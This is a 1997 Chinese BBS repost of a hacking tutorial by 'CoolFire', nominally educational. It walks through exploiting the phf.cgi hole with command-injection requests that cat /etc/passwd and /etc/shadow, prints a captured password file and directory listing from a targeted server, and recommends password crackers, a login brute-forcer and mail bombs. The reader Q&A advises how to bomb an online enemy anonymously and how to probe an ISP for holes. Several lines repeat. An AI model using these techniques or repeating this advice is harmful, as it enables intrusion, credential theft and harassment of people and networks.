发信人: Kissing.bbs@202.112.103.225 (Benny), 信区: cnhacker
标  题: 网络hacking入门(6)[转载]
发信站: 【真情流露】 (Fri Jun 27 07:53:13 1997)
转信站: Lilac!ustcnews!ustcnews!sjtunews!bupt
出  处: 202.112.103.225

这不是一个教学文件, 只是告诉你该如何破解系统,                                   
好让你能够将自己的系统作安全的保护, 如果 你能够将这份文件完全看完,              
你就能够知道电脑骇客们是如何入侵你的电脑, 我是  CoolFire, 写                    
这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password         
在昨天, 我们的首页造访人数破万了~~ 应该是增加了很多人,                          
而不是有人故意灌水的吧? 希望新 朋友们能喜欢我们的内容, 有人问到:                
有没有跟我们首页性质相近的中文站台? 很遗憾的是目前 我还没有找到....             
看得到的大多是软体, 注册机之类的破解站台. 如果你也有这样的站台的话,             
欢迎你写信给我们进行连结. 有很多网友报怨档案抓不下来,                           
先前我们已经尽了很大的努力将档 案放在国内 Server 中, 我想, 由 HiNet             
连这边应该很快吧? 还是水管塞住的问题?? 如果有人 的位址在 .edu.tw 附近的,        
欢迎来信要求 Mirror~~ 我很乐意将档案 Mirror 给你, 让其它网                      
友更方便取这些档案.                                                             
好久没有再弄出一些文章出来了, 不过最近倒是回了蛮多关於 Hacker 方面的问题,       
也收到了许多 的回应信件, 有许多的问题在这一篇文章中都会有答案,                  
甚至到现在还有很多的网友们询问甚麽 是 shadow password 的,                       
请各位多翻翻以前的文章吧!! 在 CGI Holes 方面的问题也很多, 所以在                
这一篇之後我会找个时间写一写 System Holes #2                                    
最近有许多软体更新了, 最令我们注意的当然就是 NT 4.0 罗,                         
因为它的更新肯定会带来很多的 人更新系统,                                        
当然这样先进的作业系统我们还是很期待有人会很快的将它的 Bugs 找出来的啦!!        
UpYours 这套重量级的 MailBomb 也出现的新的版本, 这次的 V4.0 Beta 2              
经试用後发现实在是 改进了很多, 但是相对的危险性也跟著提高, 其改用 Delphi        
来设计, 使得安装更为方便, 不过 美中不足的是 beta2 的版本有些功能尚未改好,       
光看到功能就让人哈翻了~~:) 这套 beta2 的版 本目前在我们的首页上可以找得到,      
关於 MailBomb: 我们的首页上所提供的 MailBomb 仅供大家作为测试用,                
请勿拿来开玩笑或是对别人 的信箱进行轰炸, 日前此类事件造成某些的 ISP 当机,       
慎至还有导致 Mail Server 记忆体不足的情 况 (哪个人这麽狠??),                    
我们也发现最近网路越来越慢了, 因为水管上积了太多要跟我们抢宽度的垃圾 信件.      
请大家以学习的心来使用这些 Bombs... 不要没事就拿来炸人好吗 ?? Then enjoy        
请大家以学习的心来使用这些 Bombs... 不要没事就拿来炸人好吗 ?? Then enjoy        
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-     
这次的主题想了好久, 一直都没有想到,                                             
不过日前有一个屋漏偏逢连夜雨的某国营事业, 在几经下X雨 及漏X的风波之後,          
在他们的主机上发现了很好玩的状况, 原本我们在使用 phf.cgi 来抓 /etc/passwd       
root:x:0:1:0000-Admin(0000):/:/sbin/sh daemon:x:1:1:0000-Admin(0000):/:         
bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/:              
adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp:     
smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:        
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico          
listen:x:37:4:Network Admin:/usr/net/nls: nadm:x:45:2::/usr/bin:/sbin/sh        
listen:x:37:4:Network Admin:/usr/net/nls: nadm:x:45:2::/usr/bin:/sbin/sh        
iuucp:x:46:5::/usr/lib/uucp/uucico:/sbin/sh nobody:x:60001:60001:uid no         
body:/: noaccess:x:60002:60002:uid no access:/:                                 
gopher:x:100:1::/usr/local/bin:/usr/local/bin/GopherUserScript                  
news:x:105:100::/usr/local/etc/innd:/usr/lib/rsh ftp:x:106:101:Anonymous        
FTP:/export/ftp:/bin/false hanshin:x:109:1::/home1/hanshin:/usr/lib/rsh         
dayeh:x:110:1::/home1/dayeh:/usr/lib/rsh                                        
ming:x:133:1::/home1/ming:/usr/bin/ksh                                          
charlesl:x:139:1::/home1/charlesl:/usr/lib/rsh                                  
iiimail:x:142:6::/home/iiimail:/usr/lib/rsh                                     
charles.lo:x:156:1::/home1/charles.lo:/usr/lib/rsh                              
webmaster:x:161:1::/home1/webmaster:/usr/lib/rsh                                
mark:x:171:1::/home1/mark:/usr/lib/rsh                                          
jcteam:x:172:1::/home1/jcteam:/usr/lib/rsh                                      
/usr/local/bin/ph -m alias=x /bin/cat /etc/shadow                               
但是有时候虽然 phf.cgi 这个程式的漏洞没有被补上,                                
还是有很多的机器不理会这个指令, 不过当这 个指令生效, 但是你看到的却是一个       
shadow 过的 passwd 的时候, 请不要灰心, 因为这台机器已经在 你的手中了,           
total 466 -rw-r--r--   1 root     root           38 May  2  1996                
#etcnamed.boot# -rw-r--r--   1 root     root        20579 May  1  1996          
#sendmail.cf# drwxr-xr-x  11 root     root         2048 Apr 17 13:07 .          
drwxr-xr-x  24 root     root         1024 Mar 26 08:16 .. -rw-r--r--   1        
root     root         2167 Aug 24  1995 DIR_COLORS -rw-r--r--   1 root          
root           15 May  1  1996 HOSTNAME -rw-r--r--   1 root     root            
4 Feb 24  1993 NETWORKING -rw-r--r--   1 root     root           48 Dec 30      
1994 NNTP_INEWS_DOMAIN -rw-r--r--   1 root     root            0 May 13         
1994 at.deny drwxr-xr-x   2 root     root         1024 Apr 11  1996 backups     
                                                                                
1994 at.deny drwxr-xr-x   2 root     root         1024 Apr 11  1996 backups     
-rw-r--r--   1 root     root         1212 Jul 10  1993 bootptab -rw-r--r--      
1 root     root            0 Feb 15  1994 csh.cshrc -rw-r--r--   1 root         
root          893 Apr 12  1996 csh.login drwxr-xr-x   2 root     root           
1024 Apr 16  1996 default -rw-r--r--   1 root     root          154 Aug 21      
1994 exports -rw-r--r--   1 root     root            0 May 13  1995             
fastboot -rw-r--r--   1 root     root         1118 Jan 28  1994 fdprm           
drwxr-xr-x   2 root     root         1024 Apr 12  1996 fs -rw-r--r--   1        
root     root          250 Dec  9 19:19 fstab -rw-r--r--   1 root     root      
                                                                                
242 Dec  5 13:55 fstab~ -rw-r--r--   1 root     root         1915 Jan 27        
07:46 ftpaccess -rw-r--r--   1 root     root          368 Aug  1  1994          
ftpconversions -rw-r--r--   1 root     root            0 Aug  9  1994           
ftpgroups -rwxr-xr-x   1 root     root           50 May  1  1996 ftponly        
-rw-r--r--   1 root     root          501 Apr 26  1996 ftpusers -rw-r--r--      
1 root     root           76 Aug 21  1994 gateways -rw-r--r--   1 root          
root          669 May 19  1994 gettydefs -rw-r--r--   1 root     root           
291 Jun  6  1996 group -rw-r--r--   1 root     root           27 Jul  7         
1994 host.conf -rw-r--r--   1 root     root          628 Jul 12  1996 hosts     
-rw-r--r--   1 root     root          600 Jan  6 10:18 hosts.allow              
-rw-r--r--   1 root     root          341 May  9  1996 hosts.deny               
-rw-r--r--   1 root     root          313 Mar 16  1994 hosts.equiv              
-rw-r--r--   1 root     root          302 Sep 23  1993 hosts.lpd -rw-r--r--     
-rw-r--r--   1 root     root          302 Sep 23  1993 hosts.lpd -rw-r--r--     
1 root     root          653 Apr 24  1996 hosts~ lrwxrwxrwx   1 root            
root            1 Apr 12  1996 inet -> . -rw-r--r--   1 root     root           
3677 Jan  6 10:20 inetd.conf -rw-r--r--   1 root     root         3664 Apr      
23  1996 inetd.conf~ -rw-r--r--   1 root     root         2351 Apr 18  1996     
inittab -rw-r--r--   1 root     root         2046 Jul 28  1994                  
inittab.gettyps.sample -rw-r--r--   1 root     root           27 Apr 17         
12:43 issue -rw-r--r--   1 root     root            3 Apr 17 12:43              
klogd.pid -rw-r--r--   1 root     root         1223 Apr 17 12:43                
ld.so.cache -rw-r--r--   1 root     root           71 Aug 14  1995              
ld.so.conf drwxr-xr-x   2 root     root         1024 Apr 12  1996 lilo          
-rw-r--r--   1 root     root          479 Apr 13  1996 lilo.conf -rw-r--r--     
1 root     root          479 Apr 13  1996 lilo.conf.bak -rw-r--r--   1 root     
root          266 Apr 17 12:42 localtime -rw-r--r--   1 root     root           
76873 Oct 17  1995 magic -r--r--r--   1 root     root          105 May  8       
1994 mail.rc -rw-r--r--   1 root     root           14 Apr 17 12:43 motd        
drwxr-xr-x   2 root     root         1024 Aug  1  1994 msgs -rw-r--r--   1      
root     root          151 Apr 17 20:43 mtab -rw-r--r--   1 root     root       
                                                                                
833 Jun 29  1994 mtools -r--r--r--   1 root     root          974 Apr 17        
11:48 named.boot -r--r--r--   1 root     root         2568 May  2  1996         
named.boot,v -r--r--r--   1 root     root          764 Mar  8 16:54             
named.boot.v1 -r--r--r--   1 root     root          813 Mar 17 08:45            
named.boot.v1 -r--r--r--   1 root     root          813 Mar 17 08:45            
named.boot.v2 -r--r--r--   1 root     root          521 Apr 18  1996            
named.boot.~1.3~ -r--r--r--   1 root     root          566 Apr 19  1996         
named.boot.~1.4~ -r--r--r--   1 root     root          566 Apr 19  1996         
named.boot.~1.5~ -r--r--r--   1 root     root          707 Mar  5 08:32         
named.boot.~1.6~ -rw-r--r--   1 root     root          566 Apr 19  1996         
named.boot~ -rw-r--r--   1 root     root          235 May  1  1996 networks     
-rw-r--r--   1 root     root          237 Apr 24  1996 networks~ -rw-r--r--     
1 root     root            0 May  8  1995 nntpserver -rw-r--r--   1 root        
1727 Apr 17 13:07 passwd -r--r--r--   1 root     root         1662 Apr 17       
13:06 passwd- -rw-r--r--   1 root     root         1715 Apr 17 13:06            
passwd.OLD -rw-r--r--   1 root     root         1494 Feb 12 14:22               
passwd.old -rw-r--r--   1 root     root         1354 Jun  6  1996 passwd~       
drwxr-xr-x   2 root     root         1024 Jul  9  1994 ppp -rw-r--r--   1       
root     root         2240 May 20  1994 printcap -rw-r--r--   1 root            
root         1083 Apr 12  1996 profile -rw-r--r--   1 root     root             
595 Aug 21  1994 protocols drwxr-xr-x   2 root     root         1024 Jan  3     
23:59 rc.d -rw-r--r--   1 root     root           41 May  1  1996               
resolv.conf -rw-r--r--   1 root     root           65 Jan 31  1996              
resolv.conf~ -rw-r--r--   1 root     root          743 Aug  1  1994 rpc         
-rw-r--r--   1 root     root           87 Jun  6  1996 securetty -r--r--r--     
-rw-r--r--   1 root     root           87 Jun  6  1996 securetty -r--r--r--     
1 root     root        20579 May  1  1996 sendmail.cf -r--r--r--   1 root       
20541 Apr 13  1996 sendmail.cf~ -rw-r--r--   1 root     root          408       
Apr 25 17:17 sendmail.st -rw-r--r--   1 root     root         5575 Aug  1       
1994 services -rw-r--r--   1 root     root           68 Jun  6  1996 shells     
drwxr-xr-x   3 root     root         1024 Nov 13  1994 skel -rw-r--r--   1      
root     root          314 Jan 10  1995 slip.hosts -rw-r--r--   1 root          
root          342 Jan 10  1995 slip.login -rw-r--r--   1 root     root          
455 Aug  1  1994 snooptab -rw-------   1 root     users         524 Jul 18      
1996 ssh_host_key -rw-r--r--   1 root     users         327 Jul 18  1996        
ssh_host_key.pub -rw-------   1 root     users         512 Mar 10 09:03         
ssh_random_seed -rw-r--r--   1 root     users         607 Jul 18  1996          
sshd_config -rw-r-----   1 root     root          501 Apr 26  1996              
syslog.conf -rw-r--r--   1 root     root            3 Apr 17 12:43              
syslog.pid -rw-r--r--   1 root     root       183942 Aug  9  1995 termcap       
-rw-r--r--   1 root     root          126 Nov 24  1993 ttys lrwxrwxrwx   1      
root     root           13 Apr 12  1996 utmp -> /var/adm/utmp drwxr-xr-x        
2 root     root         1024 Aug 25  1995 vga lrwxrwxrwx   1 root     root      
                                                                                
13 Apr 12  1996 wtmp -> /var/adm/wtmp -rw-r--r--   1 root     root              
76 May  8  1995 yp.conf.example lrwxrwxrwx   1 root     root            7       
76 May  8  1995 yp.conf.example lrwxrwxrwx   1 root     root            7       
上面的 %20 所代表的是 [Space] 也就是空白键啦! 那上面这个 Location               
就如同我们已经 Telnet 到 这台机器上, 下了: ls -l -a /etc 这个指令一样,          
嗯... 也就是说....$^^*^$@@# OK! 当你抓 /etc/passwd 所抓到的是 shadow 过的       
passwd 档, 你一定会要抓真正的 shadow 档来作 "配对" 的动作... 所以呢, 下了       
ls 指令来找找看到底真的 shadow 是藏在哪里, 当然你可以看的不 只是 /etc           
这个目录, 任何目录你都可以看, 当然你可以使用的也不只是 cat 及 ls                
这两个指令, 你 可以用更多的指令~~ 那麽还有甚麽作不到的呢 ???                    
我想可能还是有很多哩~~ 因为 phf.cgi 好像只 把你所下的指令丢给 shell             
後直接拦下它输出的结果, 也就是如果像是 /bin/passwd userid 这样的                
指令就不能用~ 因为它会要等你输入下一个字串~~ 除非先写入一个档案,                
然後用来代入 "<".. 嗯.. 最近很忙, 没有空作这些无聊事, 不过 phf.cgi              
还真的蛮好玩的, 我已经试了好几台机器都可以看到 文件内容及档案, 目录...          
经过这样的说明, 你是不是有些 Idea ?? 还是记起以前有试过其它的机器的 phf.cgi     
也可以这样子 玩的 ?? 嗯~ 再连过去玩玩看吧! 发挥一下你的想像力~~ /etc/passwd     
很容易就可以得手的喔~~ 对 了~ 不要乱搞政府机关 or 你们的学校啦!!~~              
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-     
                                                                                
                                                                                
记得先前一直介绍大家使用 CJack V1.4 来破解密码档, 那是因为它 "够快", 在         
Encrypt 的速度及 比对的速度上实在快了很多,                                      
但是之後由於很多网友的作业环境是在 Windows 95 之下, 所以 Jack 不能跑,           
我们就介绍大家使用 John the Ripper V1.1 这个 Passwrod Cracker~ 现在这套         
Cracker 出了新的版本了, 经过我们的试用觉得应该好好的为它介绍一番,               
原来一直声称速度上比 CJack14 还要快的 John, 经过实际上的测试,                   
总感觉速度没有 Jack 来得快, 虽然作者声称是因为他们这支 程式是以 486             
机器作最佳化的, 在 386 上跑起来会比较慢, 但是旧的 V1.1 实在是比 Jack 还要慢     
而 1.4 版在 EnCrypt 上实在是下了点功夫, 也对 Win32 版本有了支援,                
当你下载解开後会发现里 面有 DOS.ZIP WIN32.ZIP SOURCE.TGZ 这三个档, 分别是在     
DOS 下使用的版本, Win95,NT 下使用的 版本及 Unix 下使用的版本,                   
你还要再解开 COMMON.ZIP(共用档) 及 DOC.ZIP(说明档),                             
经过测试速度上明显提升很多, 但是我不 敢讲它比 Jack 要快多少, 至少在我的         
Pentium 133 的机器上跑起来觉得差不多, 也没有谁比较快 谁比较慢的感觉~~           
当然这个程式里面只含了一个小小的字典档供你测试,                                 
想要发挥它最大的效能还是先要有一个不错的 字典档,                                
想要发挥它最大的效能还是先要有一个不错的 字典档,                                
但是新的版本中可以让你设定自动产生序数及字串比对(之前的好像也有吧?),            
至於如何操 作, 我想他跟 Jack 及前一版本的操作方法相同, 就不用再多作介绍了~~     
Usage: john [flags] [passwd files] Flags: -pwfile:<file>[,..]     specify       
passwd file(s) -wordfile:<file> -stdin wordlist mode, read words from           
<file> or stdin -rules                  enable rules for wordlist mode          
-incremental[:<mode>]   incremental mode [using john.ini entry <mode>]          
-single                 single crack mode -external:<mode>        external      
mode, using john.ini entry <mode> -restore[:<file>]       restore session       
[from <file>] -makechars:<file>       make a charset, <file> will be            
overwritten -show                   show cracked passwords -test                
                                                                                
perform a benchmark -users:<login|uid>[,..] crack this (these) user(s) only     
-shells:[!]<shell>[,..] crack users with this (these) shell(s) only             
-salts:[!]<count>       crack salts with at least <count> accounts only         
-lamesalts              assume plaintext passwords were used as salts           
-timeout:<time>         abort session after a period of <time> minutes          
-list                   list each word -beep -quiet            beep or          
don't beep when a password is found -noname -nohash         don't use           
don't beep when a password is found -noname -nohash         don't use           
memory for login names or hash tables -des -md5               force DES or      
有没有看到最後一行? 有 MD5 mode 的支援了哩~~~ 嗯.. 介绍完了! 当然!              
这支程式我们也传回来了, 你可以在我们的首页找到, 或者你也可以试 者 archie        
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-     
许多东西没有空整理, 但是还是收集了一部分的问答出来,                             
[Q0]我抓了 KOS 但是抓到 1.2MB 左右就停了, 不晓得哪里还可以抓到.                 
[A0]如果你是想要我们站上 KOS 中的字典档, 那麽很报歉, 因为这东西只有本站的       
KOS 中有包, 在别的地方抓到的 KOS 不含我们这个字典档 (这是我们自己加料过的,      
其它程式相同), 这也 是为甚麽首页上的 KOS 如此大了~ 如果你所要的是 KOS           
的程式, 那麽你可以到 www.yahoo.com 这个搜寻引擎中找 "globalkos" 这个字串,       
会有很多地下站台的列表, 接著你就可以在这些地 方找一个连线速度较快的主机抓取     
KOS 了~~                                                                        
[Q1]我尝试用 NETTERM 及 LetMeIn 进入自己所建立的糸统(SCO Unix V). 1.            
因为帐号是本人的,所以我将密码放於在字典档第三行内. 2.                           
在LetMeIn中选定我的字典档. 3.   在NETTERM中输入我的帐号,然後按输入键. 4.        
在Password 的出现後回到LetMeIn. 5.      按Start Break. 6.       当Delay         
Time到了,键盘上的"NumLock"闪过不停, 不过,过了第三行(猜想 ...                    
很久)也没有反应.老是停在Password这个浮标傍. 7.                                  
当再选LetMeIn後看见字典档内的字逐一出现於最低的行内. 这好像没有按输入键.        
请替我解答,可以麽? 还想问问在那里可找到新的LetMeIn 及ClayMore版本 多谢帮忙.     
[A1] 1. 连上主机, 待 user: 出现时不用输入你的 user id. 2. 启动 LetMeIn 1.0      
选定字典档 3. 在 Setup Keys 中输入你的 User ID 并加上一个 '~' 号(代表 Enter     
4. 在 After Keys 中输入 '~' 号, 表示密码输入完也要按 Enter. 5. 按下 Start       
Break, 在时间倒数完毕前将滑鼠点一下 telnet (Netterm) 程式视窗,                  
ps... 以上.. 更正一下你的操作方式, 并请如果弄懂了 LetMeIn 的操作                
方式时帮我写一下说明... 因为有太多人的操作都错了~~ 不晓得是不                   
是我的说明写得太差了哩 ??? LetMeIn 及 ClayMore 目前都未出新版本, LetMeIn        
***                                                                             
[Q2]我download了kabomb3.0,但又怕给查出来...我在网上有一个很嚣张的敌人呢!      
[Q2]我download了kabomb3.0,但又怕给查出来...我在网上有一个很嚣张的敌人呢!      
[A2]KaBoom 3.0 经测试无法 Fake IP, 所以很可能会被查出来~~~ 不过要看 isp 配      
不配合抓~~~ 也就是说因为拨接是动态 Ip, 较不容易查出(需透过 ISP)...但是如        
[Q3]那麽有没有完全不会被查出的email bomber呢?:-) [A3]Windows 上的            
AnonyMailer 就是了~~ 但没有强大的炸人功能~~ 用途为发一般 之匿名信件,            
或是你可找 Unix 上的Bomb Script..在 Unix 上炸... 再不.. 就试 装 UpYours         
*** [Q4]I can't get the email bomb files except the kabomb..Can you help me     
solve this problem? [A4]You can download it from my site. If there's some       
*** [Q5] I trust that the GlobalKOS just down ..so I can get the KOS crack      
files. Can you tell where I can get or put the file in your homepage?           
Thanks you for you attention.. [A5]对~ 经过连结测试该 Server                    
好像已经没有回应了, 目前已将 Global KOS 档 案整理好放置於首页上供大家下载,      
原先是遵重作者的反应不得放连结的, 现 在由於该 Server 停掉了,                    
*** [Q6]ShaDow 系唔系唔可以解o架 !? 有o既话用边个程式呀 ? 点样先可以做到呢      
                                                                                
*** [Q6]ShaDow 系唔系唔可以解o架 !? 有o既话用边个程式呀 ? 点样先可以做到呢      
? [A6]You can use deshadow like program to De-Shadow the shadowed file. Or      
you can use 'ypcat ' command to view the shadowed file. But almost ISP have     
[Q7]我个ISP 用 SUN/OS , □D Sercuity 好劲o架 ! 我想睇□D档案时 , 会出现         
Permission Denied , 我咪用 More / Less ! 然後用 ftp 想睇 , 用<!cat> 又唔准      
! get file 都唔得 ! 我知□个Passwd 档摆系边都罗唔到 ! □请问                    
你又有无办法去罗□个档案啊 ! [A7]SUN OS ?? You should to check that system      
again and tell me what version is it ? And you should check what ftp deamon     
and what http deamon and sendmail version. You should check everything          
about that server and try to found every hole would be in that system. And      
try to get into the system. After you get in. get more information from         
[Q8]我系你度罗o左个Guess Cracking Program ! 不过我都系唔知点样用□ !            
我Upload 晒所有档案上去ISP Server 度 ! 然後就按 cc -o guess getpwdent.c         
<-例如 □就 话我D规格错误 ! 搅到我用唔到 ! [A8]some ISP did not support c       
[Q9]点样o既档案先可以系 SUN / OS 度用嫁 ? 我搅o黎搅去都整唔到执行档 !           
咪就系 Guess 个程式罗 ! [A9]Sun OS always use shadow program. And the           
shadowed file may not found in /etc directory, And may called '.shadow'.        
shadowed file may not found in /etc directory, And may called '.shadow'.        
[Q10]Global Kos 个Server 系咪有问题啊 ? 我上极去都上唔到啊 !                    
如果唔介意可唔可以 Attach个档案俾我啊 ? [A10]There's a little problem to        
that server. and i think it have been shut-down a while. So i will be put       
[Q11]Crack Jack 1.4 系唔系可以系 Sun/Os Or Unix 度用o架 ?                       
我有个朋友叫我用□系个 Server 做Crack Password  ! 但系我就唔知点样可以用DOS     
o既 *.exe 档系SUN/Os OR UNIX 度执行 ! [A11]CJack is running under dos mode.     
And it could not run under unix mode. So if you want crack some password        
file. FTP it and put it into a dos OS machine. Run CJack!                       
当然如果你坚持要在 Unix 系统下跑的话, 还是有这种软体 的, 最近新版的 John        
the Ripper V1.4 就有附 Source Code 可以让你在你的主机 上面 Compiler....         
*** [Q12]我对hacker这门课有些兴趣(虽然我一窍不通:-P ).想请教您几个问题:         
我使用 " John the Ripper V1.0 " 来crack一个名叫 "passwd"的密码档,               
但是很奇怪的,我执行後,显示了一些字,就跳回DOS了.好像根本没有执行crack的动作.     
您能帮小弟找出原因吗? 画面如下: C:\Hacker>john -beep -w:123.txt passwd John     
the Ripper  Version 1.0  Copyright (c) 1996 by Solar Designer Loaded 0          
accounts with 0 different salts C:\Hacker>                                      
accounts with 0 different salts C:\Hacker>                                      
123.txt是"字典档"(其实是四,五十个ID); passwd则是我们的"目标:密码档.             
[A12]很正确的指令, 不过 0 accounts with 0 different salts 就有点怪了~~~         
据我的判断你的 passwd 档是 shadow 过的档, 没有用~~~~ 所以 John 找不到           
"有效的" 资料来判读~~~ 新版的 John 有一个 UnShadow.exe 的档案, 据说可           
用来组合 shadow 及 passwd 使其还原, 不过前提还是要两个档都抓到, 如果            
只抓到一个档是没有用的!! 记得上次有个软体声称其注册版可以解 shadow..            
[Q13]您听过一个叫: LANWATCH 的软体吗?                                           
我听说它可以:过滤(拦截)Internet上的封包 资料,并可"监视"使用者的一举一动?!       
哇!!!太帅了!您有它的相关资料吗? [A13]No~~ 没玩过~~ 不过你是用拨接上线吗 ???     
[Q14]我这里有个                                                                 
浏览器的Bomb(用java写的).据我自己(太牺牲了...)的测试,不论你是                   
用Netscape或MSIE, 它都会让你的浏览器一直重复开很多个视窗,直到记忆体耗完         
为止!!! :-P 不知您有无兴趣想要看看? [A14]我也有个可 FORMAT C: 的 JAVA...        
不过没用就是了~~ 哈哈~ 这种东西少玩.... 我宁愿多破几间站台~~~ 嘻:::::::         
快把 Java Option 关掉吧! 免得以後看我的 Page 会 Formatting ?? <--               
*** [Q15] 感谢您在网页上的资讯造福了我们这些刚入门的新手 ^_^                    
*** [Q15] 感谢您在网页上的资讯造福了我们这些刚入门的新手 ^_^                    
根据您提供的方法,成功的取得 Linux.xxxxxxx.xxxx.xxx.tw 的 /etc/passwd 并找出     
n 个 password ..... 但我在 tknet.tku.edu.tw 却碰了大钉子 ...:(  他们的          
/etc/passwd 是 shadows 的, 我猜真正的 password 可能在/etc/master.passwd ,       
但我没权限读取它 .... 经尝试了您网页提供的 3 个 Unix & Linux 的漏洞仍无效.      
不知您有没有方法解决被 shadow 的 passwd....??  提供一个帐号您可进去看 ...       
login: ******  password: **** (这是淡大的密码格 式: 4位数字) 另,在 bbs 的       
security 版有人提出现在的 www cracker 法:                                       
www.xxx.xxx/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd 问题是出在 phf ,         
                                                                                
------ 我们的首页上日前更新後增加一个网友交流板,                                
这个板的目的是让网友们可以在上面作些讨论, 如果 你常上我们的首页,                
请看一下板上有没有问题是你能够回答的? 如果有也请不吝啬的发言, 造福大家 喔~~     
网友交流板 需要你的支持~~                                                       
                                                                                
------ 再次重申, Crack 别人站台之後不要破坏别人站台中的资料,                    
此篇文章仅作为教育目的, 不主张你随 便入侵他人主机.... (高-Net 还是除外)...      
请勿将这类技术使用於破坏上 (又... 如果第三次世界 大战开打,                      
你可以任意破坏敌国的电脑网路... 我全力支持),                                    
最严重的情况(如果你真的很讨厌该主 机的话)... 就将它 Shut Down.... 好了!         
别太暴力了!                                                                     
                                                                                
      My Mail Address: coolfire@cyberspace.org 或是写到                         
fetag.cyberspace.org (回信较快) Home Page: www.showtower.com.tw/~fetag 中的     
Hackker&Mailer 区                                                               
                                                                                
                                                                                
                                                

--
※ 来源:·真情流露 bbs.crspd.bupt.edu.cn·[FROM: 202.112.102.190]
[百宝箱] [返回首页] [上级目录] [根目录] [返回顶部] [刷新] [返回]
Powered by KBS BBS 2.0 (http://dev.kcn.cn)
页面执行时间:426.701毫秒